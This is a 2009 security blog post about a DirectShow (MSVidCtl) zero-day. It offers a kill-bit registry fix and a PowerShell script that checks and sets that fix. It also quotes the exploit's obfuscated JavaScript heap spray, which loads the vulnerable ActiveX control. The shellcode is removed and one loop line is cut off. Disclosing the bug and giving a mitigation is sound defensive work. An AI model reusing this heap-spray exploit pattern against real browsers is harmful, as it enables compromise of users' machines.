Monday, July 6, 2009

New 0-day in Microsoft DirectShow

There's news of a new 0-day exploit for Microsoft's MSVidCtl.DLL (DirectShow) doing the rounds. The exploit code is publicly available on several Chinese Web sites - so be careful. There'll be plenty of noise this week concerning this 0-day.

The CSIS site has some details - and I find it disconcerting that there was any expectation that AV would preemptively detect/stop this.

You can help protect against exploitation of this control by setting the kill bit for it, i.e. the 0x400 Compatibility Flags value shown in the registry snippet below:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\
ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400
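The same mitigation as a script, added here as an example and not part of the original post or the CSIS write-up: it checks whether the kill bit (0x400, COMPAT_EVIL_DONT_LOAD) is already present in the Compatibility Flags for this CLSID and, if not, sets it without clobbering any other flags. It also covers the Wow6432Node path that 32-bit Internet Explorer reads on 64-bit Windows; the function names are mine.

```powershell
# Added example (not the original post's code): audit and set the kill bit for the MSVidCtl CLSID.
$Clsid   = '{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}'   # CLSID from the post
$KillBit = 0x400                                     # COMPAT_EVIL_DONT_LOAD
$KeyPaths = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid",
    # 32-bit IE on 64-bit Windows reads the redirected hive instead
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
)

function Test-KillBit {
    param([string]$Path, [int]$Bit)
    # $true only when the key exists and the kill bit is set in its flags
    if (-not (Test-Path $Path)) { return $false }
    $flags = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { return $false }
    return (($flags -band $Bit) -eq $Bit)
}

function Set-KillBit {
    param([string]$Path, [int]$Bit)
    # Create the key if missing, then OR the kill bit into any flags already present
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    $existing = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' `
                 -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $existing) { $existing = 0 }
    Set-ItemProperty -Path $Path -Name 'Compatibility Flags' `
        -Value ($existing -bor $Bit) -Type DWord
}

foreach ($path in $KeyPaths) {
    # The Wow6432Node branch only exists on 64-bit Windows; skip it elsewhere
    if ($path -like '*Wow6432Node*' -and -not [Environment]::Is64BitOperatingSystem) { continue }
    if (Test-KillBit -Path $path -Bit $KillBit) {
        Write-Output "Kill bit already set: $path"
    } else {
        Set-KillBit -Path $path -Bit $KillBit   # needs an elevated (administrator) prompt
        Write-Output "Kill bit set: $path"
    }
}
```

Run it again after the change (or after applying the .reg file above) and both paths should report the bit as already set.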

Details of the exploit are available on the CSIS web site; the relevant portion is also reproduced below:

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;

[SHELL CODE REMOVED]

var headersize=20;

var omybro=unescape(nndx);

var slackspace=headersize+dashell.length;

while(omybro.length
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);

while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr; memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');

DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';

myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
